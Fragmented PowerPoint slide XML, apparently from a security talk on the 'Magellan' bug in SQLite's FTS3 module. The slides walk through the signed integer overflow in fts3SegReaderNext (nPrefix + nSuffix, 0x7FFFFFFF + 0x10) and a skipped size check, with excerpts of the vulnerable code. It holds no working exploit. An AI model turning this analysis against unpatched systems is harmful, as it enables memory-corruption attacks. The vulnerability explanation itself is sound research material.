            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957800" y="3610949"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11767332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2" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345232" y="4125446"/>
            <a:ext cx="4393151"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>realloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( (5 + 0x10) × 2 )</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178489" y="2805342"/>
            <a:ext cx="5663681" cy="1701344"/>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Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>
            <a:ext cx="4570436"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00" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957800" y="3610949"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="134706244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2" name="Rectangle 21"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957800" y="3610949"/>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
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>
            <a:ext cx="4570436"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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="5B5B5B"/>
                </a:solidFill>
              </a:rPr>
              <a:t>appleAAAAAAAAAAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178489" y="5707176"/>
            <a:ext cx="5215813" cy="273746"/>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7748532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Magellan Bug</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2115207" y="1524152"/>
            <a:ext cx="7961585" cy="5110712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5495924" y="5151055"/>
            <a:ext cx="5857875" cy="781050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="237814801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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241040" y="1555039"/>
            <a:ext cx="4358951" cy="5536226"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>Rewind a little…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>What if the result of   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nPrefix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nSuffix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t> is negative?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5214258" y="2534765"/>
            <a:ext cx="4638869" cy="273746"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187021805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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>The vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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251933"/>
            <a:ext cx="3415005"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struct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smtClean="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iIdx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u8</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bLookup</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u8</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rootOnly</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sqlite3_int64</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iStartBlock</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sqlite3_int64</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iLeafEndBlock</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sqlite3_int64</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iEndBlock</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sqlite3_int64</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iCurrentBlock</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aNode</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nNode</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nPopulate</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sqlite3_blob</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pBlob</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Fts3HashElem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ppNextElem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smtClean="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smtClean="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aDoclist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pOffsetList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nOffsetList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sqlite3_int64</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iDocid</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1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8" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241040" y="1555039"/>
            <a:ext cx="4358951" cy="5536226"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>All of the variables are a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>signed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5204928" y="4690139"/>
            <a:ext cx="1634411" cy="273746"/>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TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8808100" y="251932"/>
            <a:ext cx="3200400" cy="2554545"/>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smtClean="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smtClean="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smtClean="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a:r>
            <a:b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b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snipped</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8479969" y="1"/>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8986936" y="1782066"/>
            <a:ext cx="1537995" cy="503934"/>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52679451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7FFFFFFF</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7" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178490" y="2534757"/>
            <a:ext cx="4693298" cy="255100"/>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0x10)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957800" y="3610949"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371799209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7FFFFFFF</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2" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="241040" y="5230201"/>
            <a:ext cx="4750837" cy="974759"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0x7FFFFFFF + 0x10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>0x10 ?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Elbow Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="2715059" y="4010464"/>
            <a:ext cx="828000" cy="1648800"/>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178490" y="2534757"/>
            <a:ext cx="4693298" cy="255100"/>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0x10)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957800" y="3610949"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184473226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7FFFFFFF</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3" name="Rectangle 22"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957800" y="3610949"/>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
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178489" y="2805342"/>
            <a:ext cx="5663681" cy="1701344"/>
          </a:xfrm>
          <a:prstGeom prst="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Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8531290" y="4105368"/>
            <a:ext cx="2124271" cy="261358"/>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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Doesn’t execute</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209663776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7FFFFFFF</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3" name="Rectangle 22"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="4524146"/>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apple</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2957800" y="3610949"/>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
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178489" y="2805342"/>
            <a:ext cx="5663681" cy="1701344"/>
          </a:xfrm>
          <a:prstGeom prst="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Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8531290" y="4105368"/>
            <a:ext cx="2124271" cy="261358"/>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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Doesn’t execute</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178489" y="5707176"/>
            <a:ext cx="5215813" cy="273746"/>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2957800" y="4524146"/>
            <a:ext cx="1772822"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Application Data</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562873" y="4524146"/>
            <a:ext cx="1184987" cy="500782"/>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endParaRPr lang="ko-KR" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5B5B5B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31" name="Straight Connector 30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167947" y="5064742"/>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2959834" y="5064742"/>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951722" y="5120286"/>
            <a:ext cx="1296956" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x7FFFFFFF</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="34" name="Straight Connector 33"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="33" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2248678" y="5304952"/>
            <a:ext cx="709124"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35" name="Straight Connector 34"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="33" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="167947" y="5304952"/>
            <a:ext cx="783775" cy="9172"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="2222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517042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983" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4000" dirty="0"/>
              <a:t>Vulnerable Function</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4898571" y="1"/>
            <a:ext cx="7293429" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E2E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4991877" y="55987"/>
            <a:ext cx="7100596" cy="6740307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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static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00B0F0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>fts3SegReaderNext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Fts3Table</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bIncr</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 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a:solidFill>
                  <a:srgbClr val="999999"/>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i="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>snipped</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smtClean="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smtClean="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 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" dirty="0" err="1"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err="1">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>int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677A9"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>2</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char</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sqlite3_realloc(</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SQLITE_NOMEM;</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nTermAlloc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nNew</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fts3SegReaderRequire(</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nSuffix+FTS3_VARINT_MAX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if</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!=SQLITE_OK</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b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6AB825"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>return</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rc</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memcpy</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zTerm</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nTerm</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nPrefix+nSuffix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nSuffix</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a:p>
            <a:pPr latinLnBrk="0">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fts3GetVarint32(</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pNext</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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t> </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&amp;</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pReader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
                <a:latin typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:cs typeface="굴림체" panose="020B0609000101010101" pitchFamily="49" charset="-127"/>
              </a:rPr>
              <a:t>nDoclist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="D0D0D0"/>
                </a:solidFill>
